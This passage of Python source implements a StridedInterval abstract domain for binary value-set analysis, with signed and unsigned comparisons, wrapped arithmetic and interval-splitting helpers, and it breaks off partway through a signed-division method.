Sometimes we manually set it to False to allow easy\n# implementation of test cases.\nallow_dsis = False\n\nclass StridedInterval(BackendObject):\n    \"\"\"\n    A Strided Interval is represented in the following form:\n        bits,stride[lower_bound, upper_bound]\n    For more details, please refer to relevant papers like TIE and WYSINWYX.\n\n    This implementation is signedness-agnostic, please refer to _Signedness-Agnostic Program Analysis: Precise Integer\n    Bounds for Low-Level Code_ by Jorge A. Navas, et al. for more details.\n\n    Thanks to all corresponding authors for their outstanding work.\n    \"\"\"\n    def __init__(self, name=None, bits=0, stride=None, lower_bound=None, upper_bound=None, uninitialized=False, bottom=False):\n        self._name = name\n\n        if self._name is None:\n            self._name = \"SI_%d\" % si_id_ctr.next()\n\n        self._bits = bits\n        self._stride = stride if stride is not None else 1\n        self._lower_bound = lower_bound if lower_bound is not None else 0\n        self._upper_bound = upper_bound if upper_bound is not None else (2**bits-1)\n\n        if lower_bound is not None and type(lower_bound) not in (int, long):\n            raise ClaripyVSAError(\"'lower_bound' must be an int or a long. %s is not supported.\" % type(lower_bound))\n\n        if upper_bound is not None and type(upper_bound) not in (int, long):\n            raise ClaripyVSAError(\"'upper_bound' must be an int or a long. %s is not supported.\" % type(upper_bound))\n\n        self._reversed = False\n\n        self._is_bottom = bottom\n\n        self.uninitialized = uninitialized\n\n        if self._upper_bound is not None and bits == 0:\n            self._bits = self._min_bits()\n\n        if self._upper_bound is None:\n            self._upper_bound = StridedInterval.max_int(self.bits)\n\n        if self._lower_bound is None:\n            self._lower_bound = StridedInterval.min_int(self.bits)\n\n        # For lower bound and upper bound, we always store the unsigned version\n        self._lower_bound = self._lower_bound & (2 ** bits - 1)\n        self._upper_bound = self._upper_bound & (2 ** bits - 1)\n\n        self.normalize()\n\n    def copy(self):\n        si = StridedInterval(name=self._name,\n                             bits=self.bits,\n                             stride=self.stride,\n                             lower_bound=self.lower_bound,\n                             upper_bound=self.upper_bound,\n                             uninitialized=self.uninitialized,\n                             bottom=self._is_bottom)\n        si._reversed = self._reversed\n        return si\n\n    def nameless_copy(self):\n        si = StridedInterval(name=None,\n                             bits=self.bits,\n                             stride=self.stride,\n                             lower_bound=self.lower_bound,\n                             upper_bound=self.upper_bound,\n                             uninitialized=self.uninitialized,\n                             bottom=self._is_bottom)\n        si._reversed = self._reversed\n        return si\n\n    def normalize(self):\n        if self.bits == 8 and self.reversed:\n            self._reversed = False\n\n        if self.is_empty:\n            return self\n\n        if self.lower_bound == self.upper_bound:\n            self._stride = 0\n\n        if self.lower_bound < 0:\n            self.lower_bound = self.lower_bound & (2 ** self.bits - 1)\n\n        self._normalize_top()\n\n        if self._stride < 0:\n            raise Exception(\"Why does this happen?\")\n\n        return self\n\n    def eval(self, n, signed=False):\n        \"\"\"\n        Evaluate this StridedInterval to obtain a list of concrete integers\n        :param n: Upper bound for the number of concrete integers\n        :param signed: Treat this StridedInterval as signed or unsigned\n        :return: A list of at most `n` concrete integers\n        \"\"\"\n\n        results = [ ]\n\n        if self.is_empty:\n            # no value is available\n            pass\n\n        elif self.stride == 0 and n > 0:\n            results.append(self.lower_bound)\n        else:\n            if signed:\n                # View it as a signed integer\n                bounds = self._signed_bounds()\n\n            else:\n                # View it as an unsigned integer\n                bounds = self._unsigned_bounds()\n\n            for lb, ub in bounds:\n                while 
len(results) < n and lb <= ub:\n results.append(lb)\n lb += self.stride # It will not overflow\n\n return results\n\n #\n # Private methods\n #\n\n def __hash__(self):\n return hash((self.bits, self.lower_bound, self.upper_bound, self.stride, self._reversed, self.uninitialized))\n\n def _normalize_top(self):\n if self.lower_bound == self._modular_add(self.upper_bound, 1, self.bits) and self.stride == 1:\n # This is a TOP!\n # Normalize it\n self.lower_bound = 0\n self.upper_bound = self.max_int(self.bits)\n\n def _ssplit(self):\n \"\"\"\n Split `self` at the south pole, which is the same as in unsigned arithmetic\n\n :return: A list of split StridedIntervals\n \"\"\"\n\n south_pole_right = self.max_int(self.bits) # 111...1\n # south_pole_left = 0\n\n # Is `self` straddling the south pole?\n if self.upper_bound < self.lower_bound:\n # It straddles the south pole!\n\n a_upper_bound = south_pole_right - ((south_pole_right - self.lower_bound) % self.stride)\n a = StridedInterval(bits=self.bits, stride=self.stride, lower_bound=self.lower_bound, upper_bound=a_upper_bound)\n\n b_lower_bound = self._modular_add(a_upper_bound, self.stride, self.bits)\n b = StridedInterval(bits=self.bits, stride=self.stride, lower_bound=b_lower_bound, upper_bound=self.upper_bound)\n\n return [ a, b ]\n\n else:\n return [ self.copy() ]\n\n def _nsplit(self):\n \"\"\"\n Split `self` at the north pole, which is the same as in signed arithmetic\n\n :return: A list of split StridedIntervals\n \"\"\"\n\n north_pole_left = self.max_int(self.bits - 1) # 01111...1\n north_pole_right = 2 ** (self.bits - 1) # 1000...0\n\n # Is `self` straddling the north pole?\n straddling = False\n if self.upper_bound >= north_pole_right:\n if self.lower_bound > self.upper_bound:\n # Yes it does!\n straddling = True\n elif self.lower_bound <= north_pole_left:\n straddling = True\n\n else:\n if self.lower_bound > self.upper_bound and self.lower_bound <= north_pole_left:\n straddling = True\n\n if straddling:\n a_upper_bound = north_pole_left - ((north_pole_left - self.lower_bound) % self.stride)\n a = StridedInterval(bits=self.bits, stride=self.stride, lower_bound=self.lower_bound, upper_bound=a_upper_bound)\n\n b_lower_bound = a_upper_bound + self.stride\n b = StridedInterval(bits=self.bits, stride=self.stride, lower_bound=b_lower_bound, upper_bound=self.upper_bound)\n\n return [ a, b ]\n\n else:\n return [ self.copy() ]\n\n def _psplit(self):\n \"\"\"\n Split `self` at both north and south poles\n\n :return: A list of split StridedIntervals\n \"\"\"\n\n nsplit_list = self._nsplit()\n psplit_list = [ ]\n\n for si in nsplit_list:\n psplit_list.extend(si._ssplit())\n\n return psplit_list\n\n def _signed_bounds(self):\n \"\"\"\n Get lower bound and upper bound for `self` in signed arithmetic\n :return: a list of (lower_bound, upper_bound) tuples\n \"\"\"\n\n nsplit = self._nsplit()\n if len(nsplit) == 1:\n lb = nsplit[0].lower_bound\n ub = nsplit[0].upper_bound\n\n lb = self._unsigned_to_signed(lb, self.bits)\n ub = self._unsigned_to_signed(ub, self.bits)\n\n return [ (lb, ub) ]\n\n elif len(nsplit) == 2:\n # nsplit[0] is on the left hemisphere, and nsplit[1] is on the right hemisphere\n\n # The left one\n lb_1 = nsplit[0].lower_bound\n ub_1 = nsplit[0].upper_bound\n\n # The right one\n lb_2 = nsplit[1].lower_bound\n ub_2 = nsplit[1].upper_bound\n # Then convert them to negative numbers\n lb_2 = self._unsigned_to_signed(lb_2, self.bits)\n ub_2 = self._unsigned_to_signed(ub_2, self.bits)\n\n return [ (lb_1, ub_1), (lb_2, ub_2) ]\n else:\n raise 
Exception('WTF')\n\n def _unsigned_bounds(self):\n \"\"\"\n Get lower bound and upper bound for `self` in unsigned arithmetic\n :return: a list of (lower_bound, upper_bound) tuples\n \"\"\"\n\n ssplit = self._ssplit()\n if len(ssplit) == 1:\n lb = ssplit[0].lower_bound\n ub = ssplit[0].upper_bound\n\n return [ (lb, ub) ]\n elif len(ssplit) == 2:\n # ssplit[0] is on the left hemisphere, and ssplit[1] is on the right hemisphere\n\n lb_1 = ssplit[0].lower_bound\n ub_1 = ssplit[0].upper_bound\n\n lb_2 = ssplit[1].lower_bound\n ub_2 = ssplit[1].upper_bound\n\n return [ (lb_1, ub_1), (lb_2, ub_2) ]\n else:\n raise Exception('WTF')\n\n #\n # Comparison operations\n #\n\n def identical(self, o):\n \"\"\"\n Used to make exact comparisons between two StridedIntervals. Usually it is only used in test cases.\n\n :param o: The other StridedInterval to compare with\n :return: True if they are exactly same, False otherwise\n \"\"\"\n\n if (self.bits == o.bits and\n self.stride == o.stride and\n self.lower_bound == o.lower_bound and\n self.upper_bound == o.upper_bound):\n return True\n\n else:\n return False\n\n @normalize_types\n def SLT(self, o):\n \"\"\"\n Signed less than\n\n :param o: The other operand\n :return: TrueResult(), FalseResult(), or MaybeResult()\n \"\"\"\n\n signed_bounds_1 = self._signed_bounds()\n signed_bounds_2 = o._signed_bounds()\n\n ret = [ ]\n for lb_1, ub_1 in signed_bounds_1:\n for lb_2, ub_2 in signed_bounds_2:\n if ub_1 < lb_2:\n ret.append(TrueResult())\n elif lb_1 >= ub_2:\n ret.append(FalseResult())\n else:\n ret.append(MaybeResult())\n\n if all(r.identical(TrueResult()) for r in ret):\n return TrueResult()\n elif all(r.identical(FalseResult()) for r in ret):\n return FalseResult()\n else:\n return MaybeResult()\n\n @normalize_types\n def SLE(self, o):\n \"\"\"\n Signed less than or equal to\n\n :param o: The other operand\n :return: TrueResult(), FalseResult(), or MaybeResult()\n \"\"\"\n\n signed_bounds_1 = self._signed_bounds()\n signed_bounds_2 = o._signed_bounds()\n\n ret = []\n for lb_1, ub_1 in signed_bounds_1:\n for lb_2, ub_2 in signed_bounds_2:\n if ub_1 <= lb_2:\n ret.append(TrueResult())\n elif lb_1 > ub_2:\n ret.append(FalseResult())\n else:\n ret.append(MaybeResult())\n\n if all(r.identical(TrueResult()) for r in ret):\n return TrueResult()\n elif all(r.identical(FalseResult()) for r in ret):\n return FalseResult()\n else:\n return MaybeResult()\n\n @normalize_types\n def SGT(self, o):\n \"\"\"\n Signed greater than\n :param o: The other operand\n :return: TrueResult(), FalseResult(), or MaybeResult()\n \"\"\"\n\n signed_bounds_1 = self._signed_bounds()\n signed_bounds_2 = o._signed_bounds()\n\n ret = []\n for lb_1, ub_1 in signed_bounds_1:\n for lb_2, ub_2 in signed_bounds_2:\n if lb_1 > ub_2:\n ret.append(TrueResult())\n elif ub_1 <= lb_2:\n ret.append(FalseResult())\n else:\n ret.append(MaybeResult())\n\n if all(r.identical(TrueResult()) for r in ret):\n return TrueResult()\n elif all(r.identical(FalseResult()) for r in ret):\n return FalseResult()\n else:\n return MaybeResult()\n\n @normalize_types\n def SGE(self, o):\n \"\"\"\n Signed greater than or equal to\n :param o: The other operand\n :return: TrueResult(), FalseResult(), or MaybeResult()\n \"\"\"\n\n signed_bounds_1 = self._signed_bounds()\n signed_bounds_2 = o._signed_bounds()\n\n ret = []\n for lb_1, ub_1 in signed_bounds_1:\n for lb_2, ub_2 in signed_bounds_2:\n if lb_1 >= ub_2:\n ret.append(TrueResult())\n elif ub_1 < lb_2:\n ret.append(FalseResult())\n else:\n ret.append(MaybeResult())\n\n if 
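The pole-splitting helpers above are what let every comparison in this section enumerate plain, non-wrapping bounds. A concrete 8-bit illustration (our own numbers) of how one wrapping interval is handled by _ssplit, _nsplit, and the two bounds methods:

# si = <8>0x1[0xf0, 0x10] wraps past the south pole (0xff -> 0x00):
#   si._ssplit()          -> [<8>0x1[0xf0, 0xff], <8>0x1[0x00, 0x10]]
#   si._unsigned_bounds() -> [(0xf0, 0xff), (0x00, 0x10)]
# It never crosses the north pole (0x7f -> 0x80), so the signed view is one range:
#   si._nsplit()          -> [si]
#   si._signed_bounds()   -> [(-16, 16)]   # 0xf0 reinterpreted as the signed value -16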
all(r.identical(TrueResult()) for r in ret):\n            return TrueResult()\n        elif all(r.identical(FalseResult()) for r in ret):\n            return FalseResult()\n        else:\n            return MaybeResult()\n\n    @normalize_types\n    def ULT(self, o):\n        \"\"\"\n        Unsigned less than\n\n        :param o: The other operand\n        :return: TrueResult(), FalseResult(), or MaybeResult()\n        \"\"\"\n\n        unsigned_bounds_1 = self._unsigned_bounds()\n        unsigned_bounds_2 = o._unsigned_bounds()\n\n        ret = []\n        for lb_1, ub_1 in unsigned_bounds_1:\n            for lb_2, ub_2 in unsigned_bounds_2:\n                if ub_1 < lb_2:\n                    ret.append(TrueResult())\n                elif lb_1 >= ub_2:\n                    ret.append(FalseResult())\n                else:\n                    ret.append(MaybeResult())\n\n        if all(r.identical(TrueResult()) for r in ret):\n            return TrueResult()\n        elif all(r.identical(FalseResult()) for r in ret):\n            return FalseResult()\n        else:\n            return MaybeResult()\n\n    @normalize_types\n    def ULE(self, o):\n        \"\"\"\n        Unsigned less than or equal to\n\n        :param o: The other operand\n        :return: TrueResult(), FalseResult(), or MaybeResult()\n        \"\"\"\n\n        unsigned_bounds_1 = self._unsigned_bounds()\n        unsigned_bounds_2 = o._unsigned_bounds()\n\n        ret = []\n        for lb_1, ub_1 in unsigned_bounds_1:\n            for lb_2, ub_2 in unsigned_bounds_2:\n                if ub_1 <= lb_2:\n                    ret.append(TrueResult())\n                elif lb_1 > ub_2:\n                    ret.append(FalseResult())\n                else:\n                    ret.append(MaybeResult())\n\n        if all(r.identical(TrueResult()) for r in ret):\n            return TrueResult()\n        elif all(r.identical(FalseResult()) for r in ret):\n            return FalseResult()\n        else:\n            return MaybeResult()\n\n    @normalize_types\n    def UGT(self, o):\n        \"\"\"\n        Unsigned greater than\n        :param o: The other operand\n        :return: TrueResult(), FalseResult(), or MaybeResult()\n        \"\"\"\n\n        unsigned_bounds_1 = self._unsigned_bounds()\n        unsigned_bounds_2 = o._unsigned_bounds()\n\n        ret = []\n        for lb_1, ub_1 in unsigned_bounds_1:\n            for lb_2, ub_2 in unsigned_bounds_2:\n                if lb_1 > ub_2:\n                    ret.append(TrueResult())\n                elif ub_1 <= lb_2:\n                    ret.append(FalseResult())\n                else:\n                    ret.append(MaybeResult())\n\n        if all(r.identical(TrueResult()) for r in ret):\n            return TrueResult()\n        elif all(r.identical(FalseResult()) for r in ret):\n            return FalseResult()\n        else:\n            return MaybeResult()\n\n    @normalize_types\n    def UGE(self, o):\n        \"\"\"\n        Unsigned greater than or equal to\n        :param o: The other operand\n        :return: TrueResult(), FalseResult(), or MaybeResult()\n        \"\"\"\n\n        unsigned_bounds_1 = self._unsigned_bounds()\n        unsigned_bounds_2 = o._unsigned_bounds()\n\n        ret = []\n        for lb_1, ub_1 in unsigned_bounds_1:\n            for lb_2, ub_2 in unsigned_bounds_2:\n                if lb_1 >= ub_2:\n                    ret.append(TrueResult())\n                elif ub_1 < lb_2:\n                    ret.append(FalseResult())\n                else:\n                    ret.append(MaybeResult())\n\n        if all(r.identical(TrueResult()) for r in ret):\n            return TrueResult()\n        elif all(r.identical(FalseResult()) for r in ret):\n            return FalseResult()\n        else:\n            return MaybeResult()\n\n    @normalize_types\n    def eq(self, o):\n        \"\"\"\n        Equal\n\n        :param o: The other operand\n        :return: TrueResult(), FalseResult(), or MaybeResult()\n        \"\"\"\n\n        if (self.is_integer\n                and o.is_integer\n            ):\n            # Two integers\n            if self.lower_bound == o.lower_bound:\n                # They are equal\n                return TrueResult()\n            else:\n                # They are not equal\n                return FalseResult()\n\n        else:\n            if self.name == o.name:\n                return TrueResult() # They are the same guy\n\n            si_intersection = self.intersection(o)\n\n            if si_intersection.is_empty:\n                return FalseResult()\n\n            else:\n                return MaybeResult()\n\n    #\n    # Overriding default operators in Python\n    #\n\n    def __len__(self):\n        '''\n        Get the length in bits of this variable.\n        :return:\n        
'''\n return self._bits\n\n def __eq__(self, o):\n return self.eq(o)\n\n def __ne__(self, o):\n return ~(self.eq(o))\n\n def __gt__(self, other):\n \"\"\"\n Unsigned greater than\n :param other: The other operand\n :return: TrueResult(), FalseResult(), or MaybeResult()\n \"\"\"\n return self.UGT(other)\n\n def __ge__(self, other):\n \"\"\"\n Unsigned greater than or equal to\n :param other: The other operand\n :return: TrueResult(), FalseResult(), or MaybeResult()\n \"\"\"\n\n return self.UGE(other)\n\n def __lt__(self, other):\n \"\"\"\n Unsigned less than\n :param other: The other operand\n :return: TrueResult(), FalseResult(), or MaybeResult()\n \"\"\"\n return self.ULT(other)\n\n def __le__(self, other):\n \"\"\"\n Unsigned less than or equal to\n :param other: The other operand\n :return: TrueResult(), FalseResult(), or MaybeResult()\n \"\"\"\n return self.ULE(other)\n\n def __add__(self, o):\n return self.add(o)\n\n def __sub__(self, o):\n return self.sub(o)\n\n def __mul__(self, o):\n return self.mul(o)\n\n @normalize_types\n def __mod__(self, o):\n # TODO: Make a better approximation\n if self.is_integer and o.is_integer:\n r = self.lower_bound % o.lower_bound\n si = StridedInterval(bits=self.bits, stride=0, lower_bound=r, upper_bound=r)\n return si\n\n else:\n si = StridedInterval(bits=self.bits, stride=1, lower_bound=0, upper_bound=o.upper_bound - 1)\n return si\n\n @normalize_types\n def __div__(self, o):\n \"\"\"\n Unsigned division\n :param o: The divisor\n :return: The quotient (self / o)\n \"\"\"\n\n return self.udiv(o)\n\n def __neg__(self):\n return self.bitwise_not()\n\n def __invert__(self):\n return self.bitwise_not()\n\n @normalize_types\n def __or__(self, other):\n return self.bitwise_or(other)\n\n @normalize_types\n def __and__(self, other):\n return self.bitwise_and(other)\n\n def __rand__(self, other):\n return self.__and__(other)\n\n @normalize_types\n def __xor__(self, other):\n return self.bitwise_xor(other)\n\n def __rxor__(self, other):\n return self.__xor__(other)\n\n def __lshift__(self, other):\n return self.lshift(other)\n\n def __rshift__(self, other):\n return self.rshift(other)\n\n def __repr__(self):\n s = \"\"\n if self.is_empty:\n s = '<%d>[EmptySI]' % (self._bits)\n else:\n lower_bound = self._lower_bound if type(self._lower_bound) == str else '%#x' % self._lower_bound\n upper_bound = self._upper_bound if type(self._upper_bound) == str else '%#x' % self._upper_bound\n s = '<%d>0x%x[%s, %s]%s' % (self._bits, self._stride,\n lower_bound, upper_bound,\n 'R' if self._reversed else '')\n\n if self.uninitialized:\n s += \"(uninit)\"\n\n return s\n\n #\n # Properties\n #\n\n @property\n def name(self):\n return self._name\n\n @property\n def reversed(self):\n return self._reversed\n\n @property\n def size(self):\n logger.warning(\"StridedInterval.size will be deprecated soon. 
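The operator block above maps Python's rich comparisons onto the unsigned variants (__lt__ -> ULT, __le__ -> ULE, and so on), so comparing two StridedIntervals yields a three-valued result object rather than a bool. What that looks like at a call site (constructor arguments follow the record's signature):

a = StridedInterval(bits=8, stride=2, lower_bound=0, upper_bound=10)
b = StridedInterval(bits=8, stride=1, lower_bound=20, upper_bound=30)
print(a < b)   # TrueResult: every value in a is unsigned-less-than every value in b
print(a == b)  # FalseResult: the intersection of a and b is empty
c = StridedInterval(bits=8, stride=1, lower_bound=5, upper_bound=25)
print(a < c)   # MaybeResult: 0 < 5 holds, but 10 < 5 does not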
Please use StridedInterval.cardinality instead.\")\n return self.cardinality\n\n @property\n def cardinality(self):\n if self.is_bottom:\n return 0\n elif self.is_integer:\n return 1\n else:\n return (self._modular_sub(self._upper_bound, self._lower_bound, self.bits) + self._stride) / self._stride\n\n @property\n def lower_bound(self):\n return self._lower_bound\n\n @lower_bound.setter\n def lower_bound(self, value):\n self._lower_bound = value\n\n @property\n def upper_bound(self):\n return self._upper_bound\n\n @upper_bound.setter\n def upper_bound(self, value):\n self._upper_bound = value\n\n @property\n def bits(self):\n return self._bits\n\n @property\n def stride(self):\n return self._stride\n\n @stride.setter\n def stride(self, value):\n self._stride = value\n\n @property\n @reversed_processor\n def max(self):\n if not self.is_empty:\n return self.upper_bound\n else:\n # It is empty!\n return None\n\n @property\n @reversed_processor\n def min(self):\n if not self.is_empty:\n return self.lower_bound\n else:\n # It is empty\n return None\n\n @property\n def unique(self):\n return self.min is not None and self.min == self.max\n\n def _min_bits(self):\n v = self._upper_bound\n assert v >= 0\n return StridedInterval.min_bits(v)\n\n @property\n def is_empty(self):\n \"\"\"\n The same as is_bottom\n :return: True/False\n \"\"\"\n return self.is_bottom\n\n @property\n def is_top(self):\n '''\n If this is a TOP value\n :return: True if this is a TOP\n '''\n return (self.stride == 1 and\n self.lower_bound == self._modular_add(self.upper_bound, 1, self.bits)\n )\n\n @property\n def is_bottom(self):\n \"\"\"\n Whether this StridedInterval is a BOTTOM, in other words, describes an empty set of integers\n :return: True/False\n \"\"\"\n return self._is_bottom\n\n @property\n def is_integer(self):\n '''\n If this is an integer, i.e. 
self.lower_bound == self.upper_bound\n :return: True if this is an integer, False otherwise\n '''\n return self.lower_bound == self.upper_bound\n\n #\n # Modular arithmetic\n #\n\n @staticmethod\n def _modular_add(a, b, bits):\n return (a + b) % (2 ** bits)\n\n @staticmethod\n def _modular_sub(a, b, bits):\n return (a - b) % (2 ** bits)\n\n @staticmethod\n def _modular_mul(a, b, bits):\n return (a * b) % (2 ** bits)\n\n #\n # Helper methods\n #\n\n @staticmethod\n def lcm(a, b):\n \"\"\"\n Get the least common multiple\n :param a: The first operand (integer)\n :param b: The second operand (integer)\n :return: Their LCM\n \"\"\"\n return a * b // fractions.gcd(a, b)\n\n @staticmethod\n def gcd(a, b):\n \"\"\"\n Get the greatest common divisor\n :param a: The first operand (integer)\n :param b: The second operand (integer)\n :return: Their GCD\n \"\"\"\n\n return fractions.gcd(a, b)\n\n @staticmethod\n def highbit(k):\n return 1 << (k - 1)\n\n @staticmethod\n def min_bits(val):\n if val == 0:\n return 1\n elif val < 0:\n return int(math.log(-val, 2) + 1) + 1\n else:\n # Here we assume the maximum val is 64 bits\n # Special case to deal with the floating-point imprecision\n if val > 0xfffffffffffe0000 and val <= 0x10000000000000000:\n return 64\n return int(math.log(val, 2) + 1)\n\n @staticmethod\n def max_int(k):\n # return StridedInterval.highbit(k + 1) - 1\n return StridedInterval.highbit(k + 1) - 1\n\n @staticmethod\n def min_int(k):\n return -StridedInterval.highbit(k)\n\n @staticmethod\n def _ntz(x):\n '''\n Get the position of first non-zero bit\n :param x:\n :return:\n '''\n if x == 0:\n return 0\n y = (~x) & (x - 1) # There is actually a bug in BAP until 0.8\n\n def bits(y):\n n = 0\n while y != 0:\n n += 1\n y >>= 1\n return n\n\n return bits(y)\n\n @staticmethod\n def _to_negative(a, bits):\n return -((1 << bits) - a)\n\n @staticmethod\n def upper(bits, i, stride):\n '''\n\n :return:\n '''\n if stride >= 1:\n offset = i % stride\n max = StridedInterval.max_int(bits) # pylint:disable=redefined-builtin\n max_offset = max % stride\n\n if max_offset >= offset:\n o = max - (max_offset - offset)\n else:\n o = max - ((max_offset + stride) - offset)\n return o\n else:\n return StridedInterval.max_int(bits)\n\n @staticmethod\n def lower(bits, i, stride):\n '''\n\n :return:\n '''\n if stride >= 1:\n offset = i % stride\n min = StridedInterval.min_int(bits) # pylint:disable=redefined-builtin\n min_offset = min % stride\n\n if offset >= min_offset:\n o = min + (offset - min_offset)\n else:\n o = min + ((offset + stride) - min_offset)\n return o\n else:\n return StridedInterval.min_int(bits)\n\n @staticmethod\n def top(bits, name=None, uninitialized=False):\n '''\n Get a TOP StridedInterval\n\n :return:\n '''\n return StridedInterval(name=name,\n bits=bits,\n stride=1,\n lower_bound=0,\n upper_bound=StridedInterval.max_int(bits),\n uninitialized=uninitialized)\n\n @staticmethod\n def empty(bits):\n return StridedInterval(bits=bits, bottom=True)\n\n @staticmethod\n def _wrapped_cardinality(x, y, bits):\n \"\"\"\n Return the cardinality for a set of number (| x, y |) on the wrapped-interval domain\n :param x: The first operand (an integer)\n :param y: The second operand (an integer)\n :return: The cardinality\n \"\"\"\n\n if x == y + 1:\n return 2 ** bits\n\n else:\n return ((y - x) + 1) & (2 ** bits - 1)\n\n @staticmethod\n def _is_msb_zero(v, bits):\n \"\"\"\n Checks if the most significant bit is zero (i.e. 
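The _ntz helper above counts trailing zeros via the identity y = (~x) & (x - 1): subtracting 1 flips the trailing zeros to ones, and ANDing with ~x clears every bit at or above the lowest set bit, leaving exactly one 1-bit per trailing zero. A worked case:

x = 0b101000            # 40
y = (~x) & (x - 1)      # x - 1 = 0b100111; ~x masks off everything from bit 3 up
assert y == 0b000111    # three ones remain, so _ntz(x) == 3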
is the integer positive under signed arithmetic)\n :param v: The integer to check with\n :param bits: Bits of the integer\n :return: True or False\n \"\"\"\n return (v & (2 ** bits - 1)) & (2 ** (bits - 1)) == 0\n\n @staticmethod\n def _unsigned_to_signed(v, bits):\n \"\"\"\n Convert an unsigned integer to a signed integer\n :param v: The unsigned integer\n :param bits: How many bits this integer should be\n :return: The converted signed integer\n \"\"\"\n if StridedInterval._is_msb_zero(v, bits):\n return v\n else:\n return -(2 ** bits - v)\n\n @staticmethod\n def _wrappedoverflow_add(a, b):\n \"\"\"\n Determines if an overflow happens during the addition of `a` and `b`.\n\n :param a: The first operand (StridedInterval)\n :param b: The other operand (StridedInterval)\n :return: True if overflows, False otherwise\n \"\"\"\n\n if a.is_integer and a.lower_bound == 0:\n # Special case: if `a` or `b` is a zero\n card_self = 0\n else:\n card_self = StridedInterval._wrapped_cardinality(a.lower_bound, a.upper_bound, a.bits)\n\n if b.is_integer and b.lower_bound == 0:\n # Special case: if `a` or `b` is a zero\n card_b = 0\n else:\n card_b = StridedInterval._wrapped_cardinality(b.lower_bound, b.upper_bound, b.bits)\n\n return (card_self + card_b) > StridedInterval.max_int(a.bits)\n\n @staticmethod\n def _wrappedoverflow_sub(a, b):\n \"\"\"\n Determines if an overflow happens during the subtraction of `a` and `b`.\n\n :param a: The first operand (StridedInterval)\n :param b: The other operand (StridedInterval)\n :return: True if overflows, False otherwise\n \"\"\"\n\n return StridedInterval._wrappedoverflow_add(a, b)\n\n @staticmethod\n def _wrapped_unsigned_mul(a, b):\n \"\"\"\n Perform wrapped unsigned multiplication on two StridedIntervals\n :param a: The first operand (StridedInterval)\n :param b: The second operand (StridedInterval)\n :return: The multiplication result\n \"\"\"\n\n bits = max(a.bits, b.bits)\n\n lb = a.lower_bound * b.lower_bound\n ub = a.upper_bound * b.upper_bound\n\n max_ = StridedInterval.max_int(bits)\n if lb > max_ or ub > max_:\n # Overflow occurred\n return StridedInterval.top(bits, uninitialized=False)\n\n else:\n if b.is_integer:\n # Multiplication with an integer, and it does not overflow!\n stride = abs(a.stride * b.lower_bound)\n elif a.is_integer:\n stride = abs(a.lower_bound * b.stride)\n else:\n stride = fractions.gcd(a.stride, b.stride)\n return StridedInterval(bits=bits, stride=stride, lower_bound=lb, upper_bound=ub)\n\n @staticmethod\n def _wrapped_signed_mul(a, b):\n \"\"\"\n Perform wrapped signed multiplication on two StridedIntervals\n :param a: The first operand (StridedInterval)\n :param b: The second operand (StridedInterval)\n :return: The product\n \"\"\"\n\n bits = max(a.bits, b.bits)\n\n a_lb_positive = StridedInterval._is_msb_zero(a.lower_bound, bits)\n a_ub_positive = StridedInterval._is_msb_zero(a.upper_bound, bits)\n b_lb_positive = StridedInterval._is_msb_zero(b.lower_bound, bits)\n b_ub_positive = StridedInterval._is_msb_zero(b.upper_bound, bits)\n\n if b.is_integer:\n # Multiplication with an integer, and it does not overflow!\n # Note that as long as it overflows, a TOP will be returned and the stride will be simply ignored\n stride = abs(a.stride * b.lower_bound)\n elif a.is_integer:\n stride = abs(a.lower_bound * b.stride)\n else:\n stride = fractions.gcd(a.stride, b.stride)\n\n max_ = StridedInterval.max_int(bits)\n\n if a_lb_positive and a_ub_positive and b_lb_positive and b_ub_positive:\n # [2, 5] * [10, 20] = [20, 100]\n lb = 
a.lower_bound * b.lower_bound\n            ub = a.upper_bound * b.upper_bound\n\n            if lb > max_ or ub > max_:\n                # overflow\n                return StridedInterval.top(bits)\n\n            else:\n                return StridedInterval(bits=bits, stride=stride, lower_bound=lb, upper_bound=ub)\n\n        elif not a_lb_positive and not a_ub_positive and not b_lb_positive and not b_ub_positive:\n            # [-5, -2] * [-20, -10] = [20, 100]\n            lb = (\n                StridedInterval._unsigned_to_signed(a.upper_bound, bits) *\n                StridedInterval._unsigned_to_signed(b.upper_bound, bits)\n            )\n            ub = (\n                StridedInterval._unsigned_to_signed(a.lower_bound, bits) *\n                StridedInterval._unsigned_to_signed(b.lower_bound, bits)\n            )\n\n            if lb > max_ or ub > max_:\n                # overflow\n                return StridedInterval.top(bits)\n\n            else:\n                return StridedInterval(bits=bits, stride=stride, lower_bound=lb, upper_bound=ub)\n\n        elif not a_lb_positive and not a_ub_positive and b_lb_positive and b_ub_positive:\n            # [-10, -2] * [2, 5] = [-50, -4]\n            lb = StridedInterval._unsigned_to_signed(a.lower_bound, bits) * b.upper_bound\n            ub = StridedInterval._unsigned_to_signed(a.upper_bound, bits) * b.lower_bound\n\n            if lb & (2 ** bits - 1) > max_ or ub & (2 ** bits - 1) > max_:\n                # overflow\n                return StridedInterval.top(bits)\n\n            else:\n                return StridedInterval(bits=bits, stride=stride, lower_bound=lb, upper_bound=ub)\n\n        elif a_lb_positive and a_ub_positive and not b_lb_positive and not b_ub_positive:\n            # [2, 10] * [-5, -2] = [-50, -4]\n            lb = a.upper_bound * StridedInterval._unsigned_to_signed(b.lower_bound, bits)\n            ub = a.lower_bound * StridedInterval._unsigned_to_signed(b.upper_bound, bits)\n\n            if lb & (2 ** bits - 1) > max_ or ub & (2 ** bits - 1) > max_:\n                # overflow\n                return StridedInterval.top(bits)\n\n            else:\n                return StridedInterval(bits=bits, stride=stride, lower_bound=lb, upper_bound=ub)\n\n        else:\n            raise Exception('We shouldn\\'t see this case: %s * %s' % (a, b))\n\n    @staticmethod\n    def _wrapped_unsigned_div(a, b):\n        \"\"\"\n        Perform wrapped unsigned division on two StridedIntervals.\n\n        :param a: The dividend (StridedInterval)\n        :param b: The divisor (StridedInterval)\n        :return: The quotient\n        \"\"\"\n\n        bits = max(a.bits, b.bits)\n\n        divisor_lb, divisor_ub = b.lower_bound, b.upper_bound\n\n        # Make sure divisor_lb and divisor_ub are not 0\n        if divisor_lb == 0:\n            # Can we increment it?\n            if divisor_ub == 0:\n                # We can't :-(\n                return StridedInterval.empty(bits)\n            else:\n                divisor_lb += 1\n\n        lb = a.lower_bound / divisor_ub\n        ub = a.upper_bound / divisor_lb\n\n        # TODO: Can we make a more precise estimate of the stride?\n        stride = 1\n\n        return StridedInterval(bits=bits, stride=stride, lower_bound=lb, upper_bound=ub)\n\n    @staticmethod\n    def _wrapped_signed_div(a, b):\n        \"\"\"\n        Perform wrapped signed division on two StridedIntervals.\n\n        :param a: The dividend (StridedInterval)\n        :param b: The divisor (StridedInterval)\n        :return: The quotient\n        \"\"\"\n\n        bits = max(a.bits, b.bits)\n\n        # Make sure the divisor is not 